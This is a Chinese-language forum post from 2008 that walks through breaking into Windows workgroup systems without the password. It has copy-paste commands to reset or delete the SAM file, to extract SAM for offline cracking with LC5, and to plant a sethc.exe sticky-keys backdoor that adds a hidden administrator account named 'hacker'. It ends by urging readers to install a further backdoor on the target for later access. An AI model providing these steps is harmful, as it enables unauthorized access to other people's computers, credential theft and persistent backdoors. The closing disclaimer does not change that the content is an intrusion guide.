【原创】终极思考——破解系统密码

密码, 系统, 破解, 思考, 原创

　　看见大家对于如何进入一个不知道密码的系统比较感兴趣，那么我就将自己归纳的一些方法给大家说说，当然，相信很多地方都有类似的方法，所以会的朋友可以看看里面有没有自己不知道的，当然也可以按照我说的来提升一下自己，好了闲话不多说，下面看看说说我的一些方法吧！

下面的方法都是通过进入CMD来进行破解的！有不更改密码直接进去的，也有通过暴力的方式强制的把对方的密码改为空密码来登陆系统，下面听我慢慢道来！

说明：以下方法均在工作组环境下进行破解，对于域用户我还暂时没有研究，(*^__^*) 嘻嘻……！

方法一：重置SAM文件

扫盲：什么是SAM文件！

　　在工作组环境中，SAM文件是用来存放用户系统的“数据库”文件，也就是说本机器的所有用户信息（用户名、用户密码等），这个文件位于%systemroot%/systm32/config中。

步骤：

　　想办法进入纯DOS，怎么进入我在这里就不说了（使用引导盘等方法），输入命令：

copy C:\WINDOWS\repair\sam C:\WINDOWS\system32\config\

复制代码

重启计算机即可，重启后空密码进入系统。

缺点：用户密码被重置为空密码，容易被发现

方法二：破解sam文件

步骤：进入纯DOS，将对方的SAM文件copy到自己的硬盘内，然后带回家使用工具LC5进行暴力破解！

缺点：速度慢，对于强密码难于破解成功！

方法三：使用粘贴热键后门

步骤：

进入纯DOS，然后使用命令：

copy c:\windows\system32\CMD.exe c:\windows\system32\sethc.exe

复制代码

然后重启电脑，在登陆界面，狂按shift键，然后输入命令：

net user hacker 123 /add
net localgroup administrators hacker /add

复制代码

然后使用用户：hakcer，密码：123即可登陆系统！

缺点：对方能够发现系统多了hacker用户

方法四：使用p.exe文件进行强制设置用户密码

步骤：进入纯DOS，然后执行p命令，根据提示对用户密码进行重新设置。

缺点：自己必须有P.exe程序（我现在手里没有，有的时候给大家传上来）

方法五：删除SAM文件（仅针对于2000的系统）

步骤：进入纯DOS，输入命令：

del c:\winnt\system32\config\sam

复制代码

然后重新启动系统，即可正常进入系统！

缺点：对于2000以上的系统不可用！

--------------------====================分割线====================--------------------

话后音：对于那些不知道密码的系统，自己又想进去，实际上方法是有很多的，但是都有那么一点或二点的缺点，所以，建议大家多多思考，将自己的技术结合使用！

共同缺点：由于需要进入纯DOS，而我们知道纯DOS是不支持NTFS文件系统的，所以以上方法的共同缺点是，如果系统盘为NTFS格式，那么上面的方法有一部分无法操作成功！

提示：建议大家在进入系统后，安装一个后门，应为不管你是破解SAM还是怎么的让自己能够进入对方系统，对方都是能够发现的，为了避免下次不能正常登陆，所以建议大家安装一个后门程序方便自己！对于windows路径自己灵活变更，对于2000的系统就要将上文提到的windows全部更改为winnt目录！

最后说明：本帖只属于技术讨论，任何人已上面提到的方法进行违法行为，那只为个人行为与本论坛即本人无任何关系，本人即论坛人员不承担任何连带责任！

[ 本帖最后由 saitojie 于 2008-8-28 12:06 编辑 ]

1 评分人数